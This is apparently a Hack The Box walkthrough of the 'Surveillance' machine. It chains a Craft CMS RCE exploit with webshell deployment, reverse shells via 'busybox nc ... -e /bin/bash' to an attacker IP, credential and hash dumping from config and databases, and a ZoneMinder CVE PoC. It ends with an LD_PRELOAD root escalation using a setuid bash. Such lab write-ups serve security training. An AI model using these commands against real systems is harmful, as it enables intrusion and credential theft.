Surveillance
Recon
HTTP (80)
SURVEILLANCE.HTB</a><br> <b>Powered by <a href="https://github.com/craftcms/cms/tree/4.4.14"/>Craft CMS</a></b>CraftCMS_CVE-2023-41892https://blog.calif.io/p/craftcms-rceExploiting Arbitrary Object Instantiations in PHP without Custom Classes
└─$ git clone https://github.com/0xfalafel/CraftCMS_CVE-2023-41892.git
└─$ py CraftCMS_CVE-2023-41892/craft-cms.py
Usage: python CraftCMS_CVE-2023-41892/craft-cms.py <url>
└─$ py CraftCMS_CVE-2023-41892/craft-cms.py http://surveillance.htb/
[+] Executing phpinfo to extract some config infos
temporary directory: /tmp
web server root: /var/www/html/craft/web
[+] create shell.php in /tmp
[+] trick imagick to move shell.php in /var/www/html/craft/web
[+] Webshell is deployed: http://surveillance.htb//shell.php?cmd=whoami
[+] Remember to delete shell.php in /var/www/html/craft/web when youre done
[!] Enjoy your shell
> whoami
www-data
> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)Upgrade the webshell to reverse shell:
└─$ pwncat-cs -lp 4444
---
> busybox nc 10.10.14.113 4444 -e /bin/bash
---
(remote) www-data@surveillance:/var/www/html/craft$ cat .env
# Read about configuration, here:
# https://craftcms.com/docs/4.x/config/
# The application ID used to to uniquely store session and cache data, mutex locks, and more
CRAFT_APP_ID=CraftCMS--070c5b0b-ee27-4e50-acdf-0436a93ca4c7
# The environment Craft is currently running in (dev, staging, production, etc.)
CRAFT_ENVIRONMENT=production
# The secure key Craft will use for hashing and encrypting data
CRAFT_SECURITY_KEY=2HfILL3OAEe5X0jzYOVY5i7uUizKmB2_
# Database connection settings
CRAFT_DB_DRIVER=mysql
CRAFT_DB_SERVER=127.0.0.1
CRAFT_DB_PORT=3306
CRAFT_DB_DATABASE=craftdb
CRAFT_DB_USER=craftuser
CRAFT_DB_PASSWORD=CraftCMSPassword2023!
CRAFT_DB_SCHEMA=
CRAFT_DB_TABLE_PREFIX=
# General settings (see config/general.php)
DEV_MODE=false
ALLOW_ADMIN_CHANGES=false
DISALLOW_ROBOTS=false
PRIMARY_SITE_URL=http://surveillance.htb/Enumerate the database
(remote) www-data@surveillance:/var/www/html/craft$ mysql -u craftuser -p'CraftCMSPassword2023!' -e 'SHOW DATABASES;'
+--------------------+
| Database |
+--------------------+
| craftdb |
| information_schema |
+--------------------+
(remote) www-data@surveillance:/var/www/html/craft$ mysql -u craftuser -p'CraftCMSPassword2023!' craftdb -e 'SHOW TABLES;'
| users |
...
(remote) www-data@surveillance:/var/www/html/craft$ mysql -u craftuser -p'CraftCMSPassword2023!' craftdb -e 'SELECT username, password, admin FROM users;'
+----------+--------------------------------------------------------------+-------+
| username | password | admin |
+----------+--------------------------------------------------------------+-------+
| admin | $2y$13$FoVGcLXXNe81B6x9bKry9OzGSSIYL7/ObcmQ0CXtgw.EpuNcx8tGe | 1 |
+----------+--------------------------------------------------------------+-------+There's 3 users on the box
(remote) www-data@surveillance:/var/www/html/craft$ grep sh$ /etc/passwd
root:x:0:0:root:/root:/bin/bash
matthew:x:1000:1000:,,,:/home/matthew:/bin/bash
zoneminder:x:1001:1001:,,,:/home/zoneminder:/bin/bashHmm.. the password is probably not crackable so giving up on that.
There's a SQL backup in application
(remote) www-data@surveillance:/var/www/html/craft$ ls -Alh storage/backups/
total 20K
-rw-r--r-- 1 root root 20K Oct 17 2023 surveillance--2023-10-17-202801--v4.4.14.sql.zipDownload the file with pwncat
(local) pwncat$ download storage/backups/surveillance--2023-10-17-202801--v4.4.14.sql.zip└─$ unzip surveillance--2023-10-17-202801--v4.4.14.sql.zip -d backup_sql
Archive: surveillance--2023-10-17-202801--v4.4.14.sql.zip
inflating: backup_sql/surveillance--2023-10-17-202801--v4.4.14.sql
└─$ grep surveillance.htb backup_sql/surveillance--2023-10-17-202801--v4.4.14.sql
...
INSERT INTO `users` VALUES (1,NULL,1,0,0,0,1,'admin','Matthew B','Matthew','B','admin@surveillance.htb','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec','2023-10-17 20:22:34',NULL,NULL,NULL,'2023-10-11 18:58:57',NULL,1,NULL,NULL,NULL,0,'2023-10-17 20:27:46','2023-10-11 17:57:16','2023-10-17 20:27:46');
SSH (22)
Creds:
matthew:starcraft122490
└─$ sshpass -p starcraft122490 ssh matthew@surveillance.htb
matthew@surveillance:~$ id
uid=1000(matthew) gid=1000(matthew) groups=1000(matthew)User.txt
matthew@surveillance:~$ cat user.txt
a958adc51509dc681d225995433201e0Privilege Escalation (zoneminder)
No luck with sudo
matthew@surveillance:~$ sudo -l
Sorry, user matthew may not run sudo on surveillance.There are other web applications
matthew@surveillance:~$ ss -tunlp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 511 127.0.0.1:8080 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*matthew@surveillance:/etc/nginx/sites-enabled$ cat zoneminder.conf
server {
listen 127.0.0.1:8080;
root /usr/share/zoneminder/www;
index index.php;
access_log /var/log/zm/access.log;
error_log /var/log/zm/error.log;
location / {
try_files $uri $uri/ /index.php?$args =404;
location ~ /api/(css|img|ico) {
rewrite ^/api(.+)$ /api/app/webroot/$1 break;
try_files $uri $uri/ =404;
}
location /api {
rewrite ^/api(.+)$ /api/app/webroot/index.php?p=$1 last;
}
location /cgi-bin {
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME $request_filename;
fastcgi_param HTTP_PROXY "";
fastcgi_pass unix:/run/fcgiwrap.sock;
}
location ~ \.php$ {
include fastcgi_params;
fastcgi_param SCRIPT_FILENAME $request_filename;
fastcgi_param HTTP_PROXY "";
fastcgi_index index.php;
fastcgi_pass unix:/var/run/php/php8.1-fpm-zoneminder.sock;
}
}
}Port forward the application
└─$ sshpass -p starcraft122490 ssh matthew@surveillance.htb -L 800:127.0.0.1:8080
Default credentials admin:admin doesn't work, SSH credentials doesn't work, but admin:starcraft122490 works!
Creds:
admin:starcraft122490
The version is v1.36.32
└─$ git clone https://github.com/heapbytes/CVE-2023-26035.git
└─$ py CVE-2023-26035/poc.py --target http://localhost:800/ --cmd 'busybox nc 10.10.14.113 4444 -e /bin/bash'
Fetching CSRF Token
Got Token: key:b3661e65078b87d40b5f49c3e2383a8fbb1288ca,1733601862
[>] Sending payload..
[!] Script executed by out of time limit (if u used revshell, this will exit the script)
---
└─$ pwncat-cs -lp 4444
(remote) zoneminder@surveillance:/usr/share/zoneminder/www$ id
uid=1001(zoneminder) gid=1001(zoneminder) groups=1001(zoneminder)Privilege Escalation (root)
(remote) zoneminder@surveillance:/usr/share/zoneminder/www$ sudo -l
Matching Defaults entries for zoneminder on surveillance:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User zoneminder may run the following commands on surveillance:
(ALL : ALL) NOPASSWD: /usr/bin/zm[a-zA-Z]*.pl *
(remote) zoneminder@surveillance:/home/zoneminder$ ls /usr/bin/zm[a-zA-Z]*.pl
/usr/bin/zmaudit.pl /usr/bin/zmonvif-probe.pl /usr/bin/zmsystemctl.pl /usr/bin/zmvideo.pl
/usr/bin/zmcamtool.pl /usr/bin/zmonvif-trigger.pl /usr/bin/zmtelemetry.pl /usr/bin/zmwatch.pl
/usr/bin/zmcontrol.pl /usr/bin/zmpkg.pl /usr/bin/zmtrack.pl /usr/bin/zmx10.pl
/usr/bin/zmdc.pl /usr/bin/zmrecover.pl /usr/bin/zmtrigger.pl
/usr/bin/zmfilter.pl /usr/bin/zmstats.pl /usr/bin/zmupdate.plLooks like this user has permissions to sudo any binary above without password, but rule looks tricky so we might do more.
Application allows setting LD_PRELOAD environment variable
(remote) zoneminder@surveillance:/tmp$ nano /tmp/pwn.c
(remote) zoneminder@surveillance:/tmp$ cat /tmp/pwn.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("install -m4777 /bin/bash /tmp/rootbash");
}For some reason pwncat-cs wasn't working when running gcc because ld is missing... (???) upgrade to SSH
└─$ ssh-keygen -f id_rsa -P x -q && cat id_rsa.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDgGu2C2GKJmIOqCW7eUcvNxVCLLnxqQ8/shNGyoELLM woyag@kraken
---
(remote) zoneminder@surveillance:/home/zoneminder$ mkdir ~/.ssh
(remote) zoneminder@surveillance:/home/zoneminder$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDgGu2C2GKJmIOqCW7eUcvNxVCLLnxqQ8/shNGyoELLM woyag@kraken' > ~/.ssh/authorized_keys
---
└─$ ssh zoneminder@surveillance.htb -i id_rsa
zoneminder@surveillance:/tmp$ gcc -fPIC -shared -o /tmp/pwn.so /tmp/pwn.c -nostartfiles
/tmp/pwn.c: In function ‘_init’:
/tmp/pwn.c:7:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
7 | setgid(0);
| ^~~~~~
/tmp/pwn.c:8:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
8 | setuid(0);
| ^~~~~~
zoneminder@surveillance:/tmp$ grep LD_PRELOAD /usr/bin/*.pl
/usr/bin/zmdc.pl:if ( $Config{ZM_LD_PRELOAD} ) {
/usr/bin/zmdc.pl: Debug("Adding ENV{LD_PRELOAD} = $Config{ZM_LD_PRELOAD}");
/usr/bin/zmdc.pl: $ENV{LD_PRELOAD} = $Config{ZM_LD_PRELOAD};
/usr/bin/zmdc.pl: foreach my $lib ( split(/\s+/, $ENV{LD_PRELOAD} ) ) {
/usr/bin/zmdc.pl: Warning("LD_PRELOAD lib $lib does not exist from LD_PRELOAD $ENV{LD_PRELOAD}.");LD_PRELOAD exists only in zmdc
zoneminder@surveillance:/tmp$ sudo /usr/bin/zmdc.pl version
1.36.32
zoneminder@surveillance:/tmp$ ls -l /tmp/rootbasx
ls: cannot access '/tmp/rootbash': No such file or directory
zoneminder@surveillance:/tmp$ sudo /usr/bin/zmdc.pl -h
No daemon given
Usage:
zmdc.pl {command} [daemon [options]]
Options:
{command} - One of 'startup|shutdown|status|check|logrot' or
'start|stop|restart|reload|version'. [daemon [options]] - Daemon name
and options, required for second group of commands
zoneminder@surveillance:/tmp$ sudo /usr/bin/zmdc.pl startup zoneminder
Starting server
zoneminder@surveillance:/tmp$ ls -l
total 1416
-rw------- 1 www-data www-data 200 Dec 7 19:22 phpylNcsK
-rw-r--r-- 1 zoneminder zoneminder 192 Dec 7 20:15 pwn.c
-rwxrwxr-x 1 zoneminder zoneminder 14344 Dec 7 20:23 pwn.so
-rwsrwxrwx 1 root root 1396520 Dec 7 20:33 rootbash
drwx------ 3 root root 4096 Dec 7 19:11 systemd-private-ec54c8f58b7b412b8594628d35b5caa1-ModemManager.service-M9fPjK
drwx------ 3 root root 4096 Dec 7 19:11 systemd-private-ec54c8f58b7b412b8594628d35b5caa1-systemd-logind.service-URkGsr
drwx------ 3 root root 4096 Dec 7 19:11 systemd-private-ec54c8f58b7b412b8594628d35b5caa1-systemd-resolved.service-S1o5w6
drwx------ 3 root root 4096 Dec 7 19:11 systemd-private-ec54c8f58b7b412b8594628d35b5caa1-systemd-timesyncd.service-weSxYN
-rw-r--r-- 1 zoneminder zoneminder 2137 Dec 7 20:31 t.sh
drwx------ 2 root root 4096 Dec 7 19:12 vmware-root_776-2965448177
drwxr-xr-x 2 www-data www-data 4096 Dec 7 19:11 zm
zoneminder@surveillance:/tmp$ ls -l /tmp/rootbash
-rwsrwxrwx 1 root root 1396520 Dec 7 20:33 /tmp/rootbashversion doesn't trigger it, but startup did.
Root.txt
zoneminder@surveillance:/tmp$ /tmp/rootbash -p
rootbash-5.1# id
uid=1001(zoneminder) gid=1001(zoneminder) euid=0(root) groups=1001(zoneminder)
rootbash-5.1# cat /root/root.txt
bcfcd349bb8b30f067008b14fd26c079Last updated